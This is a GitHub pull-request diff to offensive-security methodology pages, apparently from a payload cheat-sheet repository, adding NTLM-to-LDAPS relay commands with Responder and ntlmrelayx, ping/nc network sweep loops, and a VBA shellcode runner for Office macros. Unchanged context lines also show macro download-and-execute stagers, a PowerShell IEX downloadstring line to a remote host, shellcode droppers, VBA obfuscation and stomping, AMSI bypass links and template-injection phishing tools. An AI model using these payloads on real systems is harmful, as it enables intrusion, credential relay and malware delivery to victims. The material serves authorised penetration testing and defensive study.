Merge pull request #638 from ZkClown/master

Add some stuff on Office exec, Network Recon and Active Directory methodo
swisskyrepo · Apr 20, 2023 · 1e66a42 · 1e66a42
2 parents b0445a7 + 0f4d747
commit 1e66a42
Show file tree

Hide file tree

Showing 3 changed files with 134 additions and 30 deletions.
diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md
@@ -69,6 +69,7 @@
   - [Capturing and cracking Net-NTLMv2/NTLMv2 hashes](#capturing-and-cracking-net-ntlmv2ntlmv2-hashes)
   - [Man-in-the-Middle attacks & relaying](#man-in-the-middle-attacks--relaying)
     - [MS08-068 NTLM reflection](#ms08-068-ntlm-reflection)
+    - [LDAP signing not required and LDAP channel binding disabled](#ldap-signing-not-required-and-ldap-channel-binding-disabled)
     - [SMB Signing Disabled and IPv4](#smb-signing-disabled-and-ipv4)
     - [SMB Signing Disabled and IPv6](#smb-signing-disabled-and-ipv6)
     - [Drop the MIC](#drop-the-mic)
@@ -2162,6 +2163,23 @@ msf > use exploit/windows/smb/smb_relay
 msf exploit(smb_relay) > show targets
 ```
 
+### LDAP signing not required and LDAP channel binding disabled
+
+During security assessment, sometimes we don't have any account to perform the audit. Therefore we can inject ourselves into the Active Directory by performing NTLM relaying attack. For this technique three requirements are needed:
+* LDAP signing not required (by default set to `Not required`)
+* LDAP channel binding is disabled. (by default disabled)
+* `ms-DS-MachineAccountQuota` needs to be at least at 1 for the account relayed (10 by default)
+
+Then we can use a tool to poison `LLMNR`, `MDNS` and `NETBIOS` requests on the network such as `Responder` and use `ntlmrelayx` to add our computer.
+```bash
+# On first terminal
+sudo ./Responder.py -I eth0 -wfrd -P -v
+
+# On second terminal
+sudo python ./ntlmrelayx.py -t ldaps://IP_DC --add-computer
+```
+It is required here to relay to LDAP over TLS because creating accounts is not allowed over an unencrypted connection.
+
 ### SMB Signing Disabled and IPv4
 
 If a machine has `SMB signing`:`disabled`, it is possible to use Responder with Multirelay.py script to perform an `NTLMv2 hashes relay` and get a shell access on the machine. Also called **LLMNR/NBNS Poisoning**

diff --git a/Methodology and Resources/Network Discovery.md b/Methodology and Resources/Network Discovery.md
@@ -3,6 +3,7 @@
 ## Summary
 
 - [Nmap](#nmap)
+- [Network Scan with nc and ping](#network-scan-with-nc-and-ping)
 - [Spyse](#spyse)
 - [Masscan](#masscan)
 - [Netdiscover](#netdiscover)
@@ -99,6 +100,42 @@ Host script results:
 List Nmap scripts : ls /usr/share/nmap/scripts/
 ```
 
+## Network Scan with nc and ping
+
+Sometimes we want to perform network scan without any tools like nmap. So we can use the commands `ping` and `nc` to check if a host is up and which port is open.
+To check if hosts are up on a /24 range
+```bash
+for i in `seq 1 255`; do ping -c 1 -w 1 192.168.1.$i > /dev/null 2>&1; if [ $? -eq 0 ]; then echo "192.168.1.$i is UP"; fi ; done
+```
+To check which ports are open on a specific host
+```bash
+for i in {21,22,80,139,443,445,3306,3389,8080,8443}; do nc -z -w 1 192.168.1.18 $i > /dev/null 2>&1; if [ $? -eq 0 ]; then echo "192.168.1.18 has port $i open"; fi ; done
+```
+Both at the same time on a /24 range
+```bash
+for i in `seq 1 255`; do ping -c 1 -w 1 192.168.1.$i > /dev/null 2>&1; if [ $? -eq 0 ]; then echo "192.168.1.$i is UP:"; for j in {21,22,80,139,443,445,3306,3389,8080,8443}; do nc -z -w 1 192.168.1.$i $j > /dev/null 2>&1; if [ $? -eq 0 ]; then echo "\t192.168.1.$i has port $j open"; fi ; done ; fi ; done
+```
+Not in one-liner version:
+```bash
+for i in `seq 1 255`; 
+do 
+    ping -c 1 -w 1 192.168.1.$i > /dev/null 2>&1; 
+    if [ $? -eq 0 ]; 
+    then 
+        echo "192.168.1.$i is UP:"; 
+        for j in {21,22,80,139,443,445,3306,3389,8080,8443}; 
+        do 
+            nc -z -w 1 192.168.1.$i $j > /dev/null 2>&1; 
+            if [ $? -eq 0 ]; 
+            then 
+                echo "\t192.168.1.$i has port $j open"; 
+            fi ; 
+        done ; 
+    fi ; 
+done
+```
+
+
 ## Spyse
 * Spyse API - for detailed info is better to check [Spyse](https://spyse.com/)
 

diff --git a/Methodology and Resources/Office - Attacks.md b/Methodology and Resources/Office - Attacks.md
@@ -1,9 +1,10 @@
 # Office - Attacks 
 
-## Summary
+### Summary
 
 * [Office Products Features](#office-products-features)
 * [Office Default Passwords](#office-default-passwords)
+* [Office Macro execute WinAPI](#office-macro-execute-winapi)
 * [Excel](#excel)
     * [XLSM - Hot Manchego](#xlsm---hot-manchego)
     * [XLS - Macrome](#xls---macrome)
@@ -51,8 +52,55 @@ By default, Excel does not set a password when saving a new file. However, some
 | Excel      | VelvetSweatshop  | all Excel formats |
 | PowerPoint | 01Hannes Ruescher/01 | .pps .ppt     |
 
+## Office Macro execute WinAPI
 
-## XLSM - Hot Manchego 
+### Description
+
+To importe Win32 function we need to use the keyword `Private Declare`
+`Private Declare Function <NAME> Lib "<DLL_NAME>" Alias "<FUNCTION_IMPORTED>" (<ByVal/ByRef> <NAME_VAR> As <TYPE>, etc.) As <TYPE>`
+If we work on 64bit, we need to add the keyword `PtrSafe` between the keywords `Declare` and `Function`
+Importing the `GetUserNameA` from `advapi32.dll`: 
+```VBA
+Private Declare PtrSafe Function GetUserName Lib "advapi32.dll" Alias "GetUserNameA" (ByVal lpBuffer As String, ByRef nSize As Long) As Long
+```
+`GetUserNameA` prototype in C: 
+```C
+BOOL GetUserNameA(
+  LPSTR   lpBuffer,
+  LPDWORD pcbBuffer
+);
+```
+### Example with a simple Shellcode Runner
+```VBA
+Private Declare PtrSafe Function VirtualAlloc Lib "Kernel32.dll" (ByVal lpAddress As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
+Private Declare PtrSafe Function RtlMoveMemory Lib "Kernel32.dll" (ByVal lDestination As LongPtr, ByRef sSource As Any, ByVal lLength As Long) As LongPtr
+Private Declare PtrSafe Function CreateThread Lib "KERNEL32.dll" (ByVal SecurityAttributes As Long, ByVal StackSize As Long, ByVal StartFunction As LongPtr, ThreadParameter As LongPtr, ByVal CreateFlags As Long, ByRef ThreadId As Long) As LongPtr
+
+Sub WinAPI()
+    Dim buf As Variant
+    Dim addr As LongPtr
+    Dim counter As Long
+    Dim data As Long
+
+    buf = Array(252, ...)
+    
+    addr = VirtualAlloc(0, UBound(buf), &H3000, &H40)
+    
+
+    For counter = LBound(buf) To UBound(buf)
+        data = buf(counter)
+        res = RtlMoveMemory(addr + counter, data, 1)
+    Next counter
+    res = CreateThread(0, 0, addr, 0, 0, 0)
+    
+
+End Sub
+```
+
+
+## Excel
+
+### XLSM - Hot Manchego 
 
 > When using EPPlus, the creation of the Excel document varied significantly enough that most A/V didn't catch a simple lolbas payload to get a beacon on a target machine.
 
@@ -65,7 +113,7 @@ PS> C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /reference:EPPlus.dll
 PS> .\hot-manchego.exe .\blank.xlsm .\vba.txt
 ```
 
-## XLM - Macrome
+### XLM - Macrome
 
 > XOR Obfuscation technique will NOT work with VBA macros since VBA is stored in a different stream that will not be encrypted when you password protect the document. This only works for Excel 4.0 macros.
 
@@ -96,7 +144,7 @@ Macrome build --decoy-document decoy_document.xls --payload-type Macro --payload
 When using Macrome build mode, the --password flag may be used to encrypt the generated document using XOR Obfuscation. If the default password of **VelvetSweatshop** is used when building the document, all versions of Excel will automatically decrypt the document without any additional user input. This password can only be set in Excel 2003.
 
 
-## XLM Excel 4.0 - SharpShooter
+### XLM Excel 4.0 - SharpShooter
 
 * https://github.com/mdsecactivebreach/SharpShooter
 
@@ -120,7 +168,7 @@ SharpShooter.py --payload slk --output foo --rawscfile /tmp/shellcode-86.bin --s
 ```
 
 
-## XLM Excel 4.0 - EXCELntDonut
+### XLM Excel 4.0 - EXCELntDonut
 
 * XLM (Excel 4.0) macros pre-date VBA and can be delivered in .xls files.
 * AMSI has no visibility into XLM macros (for now)
@@ -162,7 +210,7 @@ python3 drive.py --x64bin GruntHttpx64.bin --x86bin GruntHttpx86.bin
 XLM: https://github.com/Synzack/synzack.github.io/blob/3dd471d4f15db9e82c20e2f1391a7a598b456855/_posts/2020-05-25-Weaponizing-28-Year-Old-XLM-Macros.md
 
 
-## XLM Excel 4.0 - EXEC
+### XLM Excel 4.0 - EXEC
 
 1. Right Click to the current sheet
 2. Insert a **Macro IntL MS Excel 4.0**
@@ -175,7 +223,7 @@ XLM: https://github.com/Synzack/synzack.github.io/blob/3dd471d4f15db9e82c20e2f13
 5. Hide your macro worksheet by a right mouse click on the sheet name **Macro1** and selecting **Hide**
 
 
-## SLK - EXEC
+### SLK - EXEC
 
 ```ps1
 ID;P
@@ -186,8 +234,9 @@ C;X1;Y102;K0;EHALT()
 E
 ```
 
+## Word
 
-## DOCM - Metasploit
+### DOCM - Metasploit
 
 ```ps1
 use exploit/multi/fileformat/office_word_macro
@@ -200,7 +249,7 @@ set FILENAME Financial2021.docm
 exploit -j
 ```
 
-## DOCM - Download and Execute
+### DOCM - Download and Execute
 
 > Detected by Defender (AMSI)
 
@@ -215,7 +264,7 @@ Execute
 End Sub
 ```
 
-## DOCM - Macro Creator
+### DOCM - Macro Creator
 
 * https://github.com/Arno0x/PowerShellScripts/tree/master/MacroCreator
 
@@ -228,7 +277,7 @@ C:\PS> Invoke-MacroCreator -i meterpreter_shellcode.raw -t shellcode -url webdav
 C:\PS> Invoke-MacroCreator -i regsvr32.sct -t file -url 'http://my.server.com/sources.xml' -d biblio -c 'regsvr32 /u /n /s /i:regsvr32.sct scrobj.dll' -o -e
 ```
 
-## DOCM - C# converted to Office VBA macro
+### DOCM - C# converted to Office VBA macro
 
 > A message will prompt to the user saying that the file is corrupt and automatically close the excel document. THIS IS NORMAL BEHAVIOR! This is tricking the victim to thinking the excel document is corrupted.
 
@@ -238,7 +287,7 @@ https://github.com/trustedsec/unicorn
 python unicorn.py payload.cs cs macro
 ```
 
-## DOCM - VBA Wscript
+### DOCM - VBA Wscript
 
 > https://www.darkoperator.com/blog/2017/11/11/windows-defender-exploit-guard-asr-rules-for-office
 
@@ -263,7 +312,7 @@ CreateObject("WScript.Shell").Exec "notepad.exe"
 ```
 
 
-## DOCM - VBA Shell Execute Comment
+### DOCM - VBA Shell Execute Comment
 
 Set your command payload inside the **Comment** metadata of the document.
 
@@ -287,7 +336,7 @@ End Sub
 ```
 
 
-## DOCM - VBA Spawning via svchost.exe using Scheduled Task
+### DOCM - VBA Spawning via svchost.exe using Scheduled Task
 
 ```ps1
 Sub AutoOpen()
@@ -311,7 +360,7 @@ End Sub
 Rem powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.1.59:80/fezsdfqs'))"
 ```
 
-## DOCM - WMI COM functions
+### DOCM - WMI COM functions
 
 Basic WMI exec (detected by Defender) : `r = GetObject("winmgmts:\\.\root\cimv2:Win32_Process").Create("calc.exe", null, null, intProcessID)`
 
@@ -357,7 +406,7 @@ Set SW = GetObject("new:" & ShellWindows).Item()
 SW.Document.Application.ShellExecute "cmd.exe", "/c powershell.exe", "C:\Windows\System32", Null, 0
 ```
 
-## DOCM/XLM - Macro Pack - Macro and DDE
+### DOCM/XLM - Macro Pack - Macro and DDE
 
 > Only the community version is available online.
 
@@ -419,7 +468,7 @@ echo "x86.bin" "x64.bin" | macro_pack.exe -t AUTOSHELLCODE -o –autopack -G sc_
 echo "http://192.168.5.10:8080/x32calc.bin" "http://192.168.5.10:8080/x64calc.bin" | macro_pack.exe -t DROPPER_SHELLCODE -o --shellcodemethod=ClassicIndirect -G samples\sc_dl.xls
 ```
 
-## DOCM - BadAssMacros
+### DOCM - BadAssMacros
 
 > C# based automated Malicous Macro Generator.
 
@@ -443,7 +492,7 @@ BadAssMacros.exe -i <path_to_doc/excel_file> -w <doc/excel> -p yes -o <path_to_o
 ```
 
 
-## DOCM - CACTUSTORCH VBA Module
+### DOCM - CACTUSTORCH VBA Module
 
 > CactusTorch is leveraging the DotNetToJscript technique to load a .Net compiled binary into memory and execute it from vbscript
 
@@ -465,7 +514,7 @@ BadAssMacros.exe -i <path_to_doc/excel_file> -w <doc/excel> -p yes -o <path_to_o
 6. Use the generated code to replace the hardcoded binary in CactusTorch
 
 
-## DOCM - MMG with Custom DL + Exec
+### DOCM - MMG with Custom DL + Exec
 
 1. Custom Download in first Macro to "C:\\Users\\Public\\beacon.exe"
 2. Create a custom binary execute using MMG
@@ -514,7 +563,7 @@ Sub Auto_Open()
 End Sub
 ```
 
-## DOCM - ActiveX-based (InkPicture control, Painted event) Autorun macro
+### DOCM - ActiveX-based (InkPicture control, Painted event) Autorun macro
 
 Go to **Developer tab** on ribbon `-> Insert -> More Controls -> Microsoft InkPicture Control` 
 
@@ -526,21 +575,21 @@ End Sub
 
 
 
-## VBA Obfuscation
+### VBA Obfuscation
 
 ```ps1
 # https://www.youtube.com/watch?v=L0DlPOLx2k0
 $ git clone https://github.com/bonnetn/vba-obfuscator
 $ cat example_macro/download_payload.vba | docker run -i --rm bonnetn/vba-obfuscator /dev/stdin
 ```
 
-## VBA Purging
+### VBA Purging
 
 **VBA Stomping**: This technique allows attackers to remove compressed VBA code from Office documents and still execute malicious macros without many of the VBA keywords that AV engines had come to rely on for detection. == Removes P-code. 
 
 :warning: VBA stomping is not effective against Excel 97-2003 Workbook (.xls) format.
 
-### OfficePurge
+#### OfficePurge
 * https://github.com/fireeye/OfficePurge/releases/download/v1.0/OfficePurge.exe
 
 ```powershell
@@ -551,7 +600,7 @@ OfficePurge.exe -d word -f .\malicious.doc -l
 ```
 
 
-### EvilClippy
+#### EvilClippy
 
 > Evil Clippy uses the OpenMCDF library to manipulate CFBF files. 
 > Evil Clippy compiles perfectly fine with the Mono C# compiler and has been tested on Linux, OSX and Windows.
@@ -573,7 +622,7 @@ EvilClippy.exe -r macrofile.doc
 ```
 
 
-## VBA - Offensive Security Template
+### VBA - Offensive Security Template
 
 * Reverse Shell VBA - https://github.com/JohnWoodman/VBA-Macro-Reverse-Shell/blob/main/VBA-Reverse-Shell.vba
 * Process Dumper - https://github.com/JohnWoodman/VBA-Macro-Dump-Process
@@ -583,7 +632,7 @@ EvilClippy.exe -r macrofile.doc
 * amsiByPassWithRTLMoveMemory - https://gist.github.com/DanShaqFu/1c57c02660b2980d4816d14379c2c4f3
 * VBA macro spawning a process with a spoofed parent - https://github.com/christophetd/spoofing-office-macro/blob/master/macro64.vba
 
-## VBA - AMSI
+### VBA - AMSI
 
 > The Office VBA integration with AMSI is made up of three parts: (a) logging macro behavior, (b) triggering a scan on suspicious behavior, and (c) stopping a malicious macro upon detection. https://www.microsoft.com/security/blog/2018/09/12/office-vba-amsi-parting-the-veil-on-malicious-macros/
 
@@ -625,11 +674,11 @@ Private Sub Document_Open()
 End Sub
 ```
 
-## DOCX - Template Injection
+### DOCX - Template Injection
 
 :warning: Does not require "Enable Macro"
 
-### Remote Template
+#### Remote Template
 
 1. A malicious macro is saved in a Word template .dotm file
 2. Benign .docx file is created based on one of the default MS Word Document templates
@@ -647,7 +696,7 @@ End Sub
     ```
 7. File gets zipped back up again and renamed to .docx
 
-### Template Injections Tools
+#### Template Injections Tools
 
 * https://github.com/JohnWoodman/remoteInjector
 * https://github.com/ryhanson/phishery
@@ -661,7 +710,7 @@ $ phishery -u https://secure.site.local/docs -i good.docx -o bad.docx
 ```
 
 
-## DOCX - DDE
+### DOCX - DDE
 
 * Insert > QuickPart > Field
 * Right Click > Toggle Field Code